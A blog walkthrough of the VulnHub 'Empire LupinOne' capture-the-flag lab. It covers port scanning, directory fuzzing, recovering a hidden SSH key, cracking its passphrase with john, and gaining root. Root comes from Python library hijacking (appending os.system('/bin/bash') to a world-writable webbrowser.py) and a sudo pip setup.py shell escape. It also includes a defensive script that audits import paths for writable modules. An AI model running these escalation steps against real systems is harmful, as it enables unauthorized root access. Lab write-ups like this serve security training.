Empire_Lupin_One

Preparation

Source: https://www.vulnhub.com/entry/empire-lupinone,750/

Kali: 192.168.81.129 255.255.255.0

Target: 192.168.81.57

Side note:

????? I used my own hotspot to make sure both machines were on the same subnet, but Kali's IPv4 address kept disappearing at random ????

nmap scan

Scan the subnet

nmap -sn 192.168.81.0/24 // -sn (host discovery only, no port scan)

└─# nmap -sn 192.168.81.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:34 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00016s latency).
MAC Address: 00:0C:29:0C:79:7F (VMware)
Nmap scan report for localhost (192.168.81.152)
Host is up (0.000038s latency).
MAC Address: AC:19:8E:9B:57:53 (Intel Corporate)
Nmap scan report for localhost (192.168.81.161)
Host is up (0.0045s latency).
MAC Address: 72:4D:8C:6A:B9:C8 (Unknown)
Nmap scan report for localhost (192.168.81.129)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.45 seconds

Check open ports

mkdir nmapscan  // save the results
nmap --min-rate 10000 -p- 192.168.81.57 -oA nmapscan/ports

└─# nmap --min-rate 10000 -p- 192.168.81.57 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 11:39 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.72 seconds

Further enumeration

TCP:

// -sT TCP connect scan (reliable)  -sC default scripts  -sV service version detection  -O OS detection
nmap -sT -sC -sV -O -p22,80 192.168.81.57 -oA nmapscan/detail

└─# nmap -sT -sC -sV -O -p22,80 192.168.81.57 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:02 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00038s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
| 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
MAC Address: 00:0C:29:0C:79:7F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (99%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.0 - 5.4 (96%), Linux 2.6.32 (96%), Linux 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds

└─# curl http://192.168.81.57/robots.txt
User-agent: *
Disallow: /~myfiles
nmap --script=vuln -p22,80 192.168.81.57 -oA nmapscan/vuln

└─# nmap --script=vuln -p22,80 192.168.81.57 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:07 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00019s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /image/: Potentially interesting directory w/ listing on 'apache/2.4.48 (debian)'
|_ /manual/: Potentially interesting folder
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds

UDP:

nmap -sU --top-ports 100 192.168.81.57 -oA nmapscan/udp

└─# nmap -sU --top-ports 100 192.168.81.57 -oA nmapscan/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-02 13:09 CST
Nmap scan report for localhost (192.168.81.57)
Host is up (0.00036s latency).
All 100 scanned ports on localhost (192.168.81.57) are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 00:0C:29:0C:79:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 59.07 seconds

http:80/ssh:22

curl http://192.168.81.57

└─# curl http://192.168.81.57
<!DOCTYPE html>
<html>
<head>
<style>
body {
margin: 0;
}

#over img {
margin-left: auto;
margin-right: auto;
display: block;
}
</style>
</head>

<body>

<div id="over" style="position:absolute; width:100%; height:100%">
<img src="/image/arsene_lupin.jpg">
</div>

</body>
</html>

<!-- Its an easy box, dont give up. -->

Check the path that robots.txt disallowed

curl http://192.168.81.57/~myfiles/  

└─# curl http://192.168.81.57/~myfiles/
<!DOCTYPE html>
<html>
<head>
<title>Error 404</title>
</head>
<body>

<h1>Error 404</h1>

</body>
</html>

<!-- Your can do it, keep trying. -->

Directory brute-force

dirsearch -u http://192.168.81.57

Target: http://192.168.81.57/

[13:36:50] Starting:
[13:36:52] 403 - 278B - /.ht_wsr.txt
[13:36:52] 403 - 278B - /.htaccess.bak1
[13:36:52] 403 - 278B - /.htaccess.orig
[13:36:52] 403 - 278B - /.htaccess.save
[13:36:52] 403 - 278B - /.htaccess.sample
[13:36:52] 403 - 278B - /.htaccess_extra
[13:36:52] 403 - 278B - /.htaccess_orig
[13:36:52] 403 - 278B - /.htaccess_sc
[13:36:52] 403 - 278B - /.htaccessBAK
[13:36:52] 403 - 278B - /.htaccessOLD
[13:36:52] 403 - 278B - /.htm
[13:36:52] 403 - 278B - /.html
[13:36:52] 403 - 278B - /.htaccessOLD2
[13:36:52] 403 - 278B - /.htpasswds
[13:36:52] 403 - 278B - /.htpasswd_test
[13:36:52] 403 - 278B - /.httr-oauth
[13:37:19] 301 - 314B - /image -> http://192.168.81.57/image/
[13:37:21] 301 - 319B - /javascript -> http://192.168.81.57/javascript/
[13:37:24] 301 - 315B - /manual -> http://192.168.81.57/manual/
[13:37:24] 200 - 208B - /manual/index.html
[13:37:34] 200 - 34B - /robots.txt
[13:37:35] 403 - 278B - /server-status
[13:37:35] 403 - 278B - /server-status/

It is an Apache server, and the earlier Disallow entry starts with ~ (a userdir-style path), so fuzzing that specific pattern turns up secret.

Tool recommendations:

ffuf:https://github.com/ffuf/ffuf

trans: translate-shell // install via apt

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~FUZZ -t 64
curl -s http://192.168.81.57/~secret/ | trans -b -e bing :zh

// -s silent mode (hides the progress meter and errors)
└─# curl -s http://192.168.81.57/~secret/ | trans -b -e bing :zh
<br>你好,朋友,我很高兴你找到了我的秘密目录。我创建它是为了与你分享我生成的 SSH 私钥文件,</>
<br>它隐藏在这里的某个地方,以防黑客找到并用 FastTrack 破解我的密码。
<br>我很聪明,我知道。
<br>有任何问题请告诉我
<h4>你最好的朋友 icex64</h4>

Look for the hidden file based on the hint

// dot-prefixed names
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/.FUZZ -t 64
// specific extensions
// -fs 277 filters out responses whose size matches the 404 page
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/.FUZZ -t 64 -fs 277 -e .key,.txt,.php

Look for hidden files under ~secret/

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277 -e .key,.txt,.php


ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.81.57/~secret/.FUZZ -t 64 -fs 277 -e .key,.txt,.php | grep secret

mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 5ms]

Base-decode to recover the OpenSSH private key

curl -s http://192.168.81.57/~secret/.mysecret.txt
// no uppercase O in the text (base58 alphabet excludes 0, O, I, l), so try base58 first
curl -s http://192.168.81.57/~secret/.mysecret.txt | base58 -d > rsa_key
chmod 600 rsa_key

Try an SSH login with the gathered information; the RSA key fails with a format error

ssh -i rsa_key icex64@192.168.81.57

└─# ssh -i rsa_key icex64@192.168.81.57
The authenticity of host '192.168.81.57 (192.168.81.57)' can't be established.
ED25519 key fingerprint is SHA256:GZOCytQu/pnSRRTMvJLagwz7ZPlJMDiyabwLvxTrKME.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.81.57' (ED25519) to the list of known hosts.
Load key "rsa_key": error in libcrypto
icex64@192.168.81.57's password:

Check the key format and regenerate the file by pasting it manually

openssl rsa -in rsa_key -check

Continue with the login: generate a hash of the key and crack the passphrase with john

For the cracking step, either hashcat or john can be used

#└─# ssh -i rsa_key icex64@192.168.81.57 | trans -b -e bing :zh
# Enter passphrase for key 'rsa_key':
# tee writes to stdout and to the file at the same time
ssh2john rsa_key | tee key_hash

# find the *2john helpers
# locate *2john
# the earlier secret page hinted at FastTrack
#locate fasttrack

# locate fasttrack.txt

# └─# locate fasttrack.txt
# /usr/share/wordlists/fasttrack.txt

# └─# wc -l /usr/share/wordlists/fasttrack.txt
# 262 /usr/share/wordlists/fasttrack.txt

john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt

└─# john key_hash --wordlist=/usr/share/wordlists/fasttrack.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd! (rsa_key)
1g 0:00:00:02 DONE (2025-11-02 14:48) 0.3861g/s 37.06p/s 37.06c/s 37.06C/s Autumn2013..testing123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

# ssh -i rsa_key icex64@192.168.81.57
# P@55w0rd!

flag1:

whoami
pwd
cat user.txt

icex64@LupinOne:~$ pwd
/home/icex64
icex64@LupinOne:~$ ls
user.txt

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

Privilege escalation

Check the users on the box

ls -hail

# 2359982 drwxr-xr-x 3 arsene arsene 4.0K Oct 4 2021 arsene
# 2360073 drwxr-xr-x 4 icex64 icex64 4.0K Oct 7 2021 icex64

Exploitation point

ls -hail
# 2361164 -rw-r--r-- 1 arsene arsene 118 Oct 4 2021 heist.py
# 2627846 drwxr-xr-x 3 arsene arsene 4.0K Oct 4 2021 .local
# 2360084 -rw-r--r-- 1 arsene arsene 339 Oct 4 2021 note.txt
# 2359984 -rw-r--r-- 1 arsene arsene 807 Oct 4 2021 .profile
# 2361167 -rw------- 1 arsene arsene 67 Oct 4 2021 .secret

cat -n note.txt

# trans -b -e bing :zh ""
# 嗨,我的朋友 Icex64,你能帮我检查一下我的代码是否安全运行吗?
# 我需要在我的下一次行动中使用它。我不希望其他人进入它,
# 因为这可能会危及我的账户并找到我的秘密文件。
# 只有你可以访问我的程序,因为我知道你的账户是安全的。
# 另一边见。阿尔塞纳·卢平。

cat heist.py

import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")

ls -hail /usr/lib/ | grep python

# 2106766 drwxr-xr-x 3 root root 4.0K Oct 4 2021 python2.7
# 2493856 drwxr-xr-x 3 root root 4.0K Oct 4 2021 python3
# 2359582 drwxr-xr-x 31 root root 12K Oct 4 2021 python3.9

ls -hail /usr/lib/python3.9 | grep webbrowser
# 2359824 -rwxrwxrwx 1 root root 24K Oct 4 2021 webbrowser.py
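The root cause here is a world-writable module (webbrowser.py, mode rwxrwxrwx) sitting on the interpreter's import path, which any local user can turn into code that runs as whoever imports it. As an added example (not part of the original write-up), the following audit walks a set of import directories and flags every .py file or directory that is group- or world-writable; the sample tree it builds under a temp directory is constructed for the demonstration.

```python
import os
import stat
import sys
import tempfile
from pathlib import Path

# Group-write or other-write on a module (or on its directory) lets a
# non-owner replace the code that privileged callers will import.
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def find_weak_modules(search_paths):
    """Return (path, mode) for every .py file or directory under the given
    import paths that is writable by group or others. Symlinks are skipped
    so a link into a user-owned tree does not produce a misleading mode."""
    findings = []
    for base in search_paths:
        base = Path(base)
        if not base.is_dir():
            continue
        for entry in sorted(base.rglob("*")):
            if entry.is_symlink():
                continue
            if entry.is_dir() or entry.suffix == ".py":
                mode = entry.stat().st_mode
                if mode & WRITABLE_BY_OTHERS:
                    findings.append((str(entry), oct(stat.S_IMODE(mode))))
    return findings


def build_demo_tree():
    """Constructed sample: a fake library directory holding one correctly
    protected module and one world-writable module named like the box's."""
    root = Path(tempfile.mkdtemp(prefix="pylib_audit_"))
    good = root / "good_module.py"
    bad = root / "webbrowser.py"
    good.write_text("import os\n")
    bad.write_text("import os\n")
    os.chmod(root, 0o755)
    os.chmod(good, 0o644)
    os.chmod(bad, 0o777)  # the misconfiguration seen on LupinOne
    return root


if __name__ == "__main__":
    # Audit the directories given on the command line, or this interpreter's sys.path.
    for path, mode in find_weak_modules(sys.argv[1:] or sys.path):
        print(f"{mode} {path}")
```

Running it with no arguments audits the current interpreter's own sys.path; a clean stdlib should report nothing.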

Library hijacking

# !! > overwrites, >> appends !!
echo 'os.system("/bin/bash")' >> /usr/lib/python3.9/webbrowser.py
# bin not lib
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

cat .secret

# arsene@LupinOne:~$ cat .secret
# I dont like to forget my password "rQ8EE"UK,eV)weg~*nd-`5:{*"j7*Q"

I kept a backup copy of the .py here, otherwise a wrong echo would be game over; the target has nano.

Link: _webbrowser.py

ctrl + o   enter   ctrl +x

SSH login

sudo ssh arsene@192.168.81.57
# rQ8EE"UK,eV)weg~*nd-`5:{*"j7*Q

sudo -l

# Matching Defaults entries for arsene on LupinOne:
# env_reset, mail_badpass,
# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

# User arsene may run the following commands on LupinOne:
# (root) NOPASSWD: /usr/bin/pip

pip privilege escalation

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

flag2:

whoami
bash
cd /root

root@LupinOne:~# ls -hail
total 36K
131073 drwx------ 4 root root 4.0K Oct 7 2021 .
2 drwxr-xr-x 18 root root 4.0K Oct 4 2021 ..
131076 -rw------- 1 root root 234 Oct 7 2021 .bash_history
131075 -rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
131077 drwxr-xr-x 3 root root 4.0K Oct 4 2021 .local
131074 -rw-r--r-- 1 root root 161 Jul 9 2019 .profile
131082 -rw------- 1 root root 12 Oct 4 2021 .python_history
131081 -rw-r--r-- 1 root root 3.3K Oct 4 2021 root.txt
131080 drwx------ 2 root root 4.0K Oct 4 2021 .ssh

cat root.txt
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}

Reproduction source

https://www.bilibili.com/video/BV1LXTrzCEjr/?spm_id_from=333.1391.0.0&vd_source=cd856a7d7a208f3060ffd0f77bb86e38


Empire_Lupin_One
https://alenirving.github.io/2025/11/02/Empire_Lupin_One/
Author
Ma5k
License
CC-BY-NC-SA